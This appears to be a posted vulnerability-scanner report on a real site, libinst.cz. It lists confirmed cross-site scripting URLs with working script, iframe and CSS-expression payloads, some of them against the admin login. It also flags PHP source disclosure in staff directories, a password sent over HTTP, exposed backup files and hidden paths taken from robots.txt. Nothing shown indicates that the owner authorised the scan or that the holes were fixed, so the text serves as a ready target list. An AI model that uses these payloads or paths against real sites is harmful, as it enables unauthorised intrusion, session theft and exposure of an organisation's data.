- http://libinst.cz - Liberální institut - XSS -
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/komentare.php?centrum=5&typ=--><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: typ
- Parameter Type: Querystring
- Attack Pattern: --><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/clanky.php?centrum=5&typ='><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: typ
- Parameter Type: Querystring
- Attack Pattern: '><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa='"--></style></script><script>alert(0x0005C6)</script>&id=985
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: adresa
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0005C6)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/stranka.php?inc=email-send&adresa=clanky.php&id='"--></style></script><script>alert(0x0005CB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0005CB)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/stranka.php?inc=multimedia
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str
- Parameter Type: Post
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: user
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0008A2)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/stranka_en.php?inc=multimedia_en
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str
- Parameter Type: Post
- Attack Pattern: "><iframe onload=alert(9)>
- ||| [Possible] Permanent Cross-site Scripting
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/admin/administrace.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://libinst.cz/admin/administrace.php?lang=en
- ||| [Possible] PHP Source Code Disclosure
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Severity: Medium
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/osobni/schwarz/
- Vulnerable URL: http://libinst.cz/osobni/sima/
- Vulnerable URL: http://libinst.cz/osobni/stastny/
- Vulnerable URL: http://libinst.cz/osobni/barak/
- Vulnerable URL: http://libinst.cz/osobni/pavlik/
- Vulnerable URL: http://libinst.cz/osobni/stefunko/
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/admin/administrace.php?lang=en&id=alter_stranka
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Form target action: administrace.php?lang=en
- ||| [Possible] Backup File Found
- Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
- Severity: Low
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/novinky.php~
- Vulnerable URL: http://libinst.cz/rss.php~
- Vulnerable URL: http://libinst.cz/komentare.php~
- Vulnerable URL: http://libinst.cz/clanky.php~
- Vulnerable URL: http://libinst.cz/stranka.php~
- ||| Robots.txt Identified
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://libinst.cz/robots.txt
- Interesting Robots.txt Entries:
- Disallow: /data
- Disallow: /etexts
- Disallow: /jirka
- Disallow: /pictures
- Disallow: /pic
- Disallow: /temp
- Disallow: /tl
- Disallow: /zeleznice
- Disallow: /cesta
- Disallow: /admin